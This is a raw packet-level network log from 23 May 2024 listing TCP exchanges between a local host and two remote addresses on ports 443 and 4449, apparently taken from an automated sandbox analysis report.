May 23, 2024 15:34:10.988759995 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.988785982 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.995660067 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.995668888 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.995944977 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.995949984 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.997587919 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.997611046 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:10.999109983 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:10.999125004 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.001769066 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.001784086 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.005278111 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.005294085 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.006078005 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.006092072 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.010330915 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.010344982 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.022923946 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.022975922 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.024033070 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.024049044 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.025171995 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.025187016 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.026753902 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.026768923 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.032850981 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.032866955 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.033153057 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.033166885 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.033870935 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.033885956 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.034523010 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.035176039 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.035188913 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.041851997 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.041867018 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.044514894 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.044529915 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.045161009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.047115088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.047179937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.049284935 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.049299002 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.051007032 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.051021099 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.051533937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.052262068 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.052277088 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.053731918 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.053747892 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.054631948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.054923058 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.054938078 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.055120945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.055131912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.055161953 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.056782007 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.056797981 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.057221889 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.057235003 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.057796001 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.057810068 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.058315992 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.058329105 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.058799982 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.058814049 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.059237957 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.059252977 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.059674025 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.059688091 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.059986115 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.059999943 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.060285091 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.060298920 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.060431957 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.060446978 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.060615063 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.060627937 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.060692072 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.060704947 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.060936928 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.060950994 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.062999964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.063066959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.066493034 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.066509962 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.066560984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.066570997 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.066616058 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.073434114 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.073487997 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.073776007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.073786974 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.073839903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.078948021 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.079003096 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.081000090 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.081012011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.081021070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.081068039 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.081677914 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.081737995 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.081792116 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.081813097 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.082272053 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.082325935 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.082389116 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.082417965 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.082638979 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.082654953 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.082801104 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.082814932 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.083189964 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.083204985 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.086461067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.086472034 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.086529016 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.088248014 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.088299036 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.088830948 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.088931084 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.088989019 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.089040995 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.091726065 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.091737032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.091793060 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.096903086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.096913099 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.096966982 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.102144003 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.102154970 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.102164030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.102199078 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.102231979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.107393026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.107403040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.107460022 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.112216949 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.112227917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.112286091 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.116518974 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.116529942 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.116591930 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.120775938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.120810032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.120883942 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.125014067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.125047922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.125080109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.125106096 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.129209042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.129278898 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.133337975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.133369923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.133428097 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.133480072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.137705088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.137738943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.137768030 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.140806913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.140873909 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.140887022 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.144443989 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.144496918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.144555092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.148107052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.148140907 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.148185015 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.151319981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.151352882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.151379108 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.154767036 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.154799938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.154813051 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.158092022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.158124924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.158138037 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.161307096 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.161340952 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.161370039 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.161371946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.161413908 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.166172028 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.166182041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.166234970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.167388916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.167398930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.167474031 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.169758081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.169766903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.169836998 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.173453093 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.173463106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.173511982 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.173523903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.175240040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.175293922 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.177897930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.177907944 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.177953005 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.180403948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.180414915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.180460930 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.182878017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.182888985 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.182897091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.182960033 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.185436010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.185446024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.185499907 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.187900066 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.187911034 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.187967062 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.190257072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.190268040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.190315962 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.192337036 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.192347050 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.192394972 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.194577932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.194587946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.194600105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.194636106 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.194706917 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.196650982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.196669102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.196717978 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.198721886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.201085091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.201095104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.201154947 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.202785969 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.202805042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.202835083 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.214374065 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.214390993 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.214405060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.214449883 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.214473963 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.214972019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217458963 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217483044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217498064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217510939 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217525005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.217566013 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.217566013 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.217602968 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.218558073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.218573093 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.218626976 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.220371962 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.220392942 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.220444918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.222172022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.222187042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.222243071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.224623919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.224638939 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.224701881 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.229500055 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.229516029 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.229530096 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.229543924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.229558945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.229578018 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.229610920 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.230552912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.230571032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.230600119 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.232501030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.232522964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.232556105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.234771967 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.234787941 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.234827995 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.238121986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.238137007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.238181114 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.239265919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.239305973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.239331961 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.239340067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.239403963 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.241190910 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.241224051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.241283894 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.243073940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.243105888 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.243161917 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.245002031 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.245035887 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.245089054 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.246882915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.246916056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.247097969 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.248795986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.248827934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.248862028 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.248884916 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.250675917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.250709057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.250735998 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.253179073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.253211021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.253236055 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.254756927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.254789114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.254818916 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.256373882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.256407022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.256438017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.256439924 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.256479025 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.258255959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.258290052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.258348942 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.260123968 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.260155916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.260232925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.262067080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.262099981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.262150049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.263966084 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.263998985 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.264046907 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.265435934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.265469074 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.265500069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.265517950 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.267005920 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.267040014 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.267098904 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.268573046 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.268604994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.268631935 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.275264978 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.275316954 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.275329113 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.276565075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.276597023 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.276616096 CEST	61010	4449	192.168.2.5	66.235.168.242
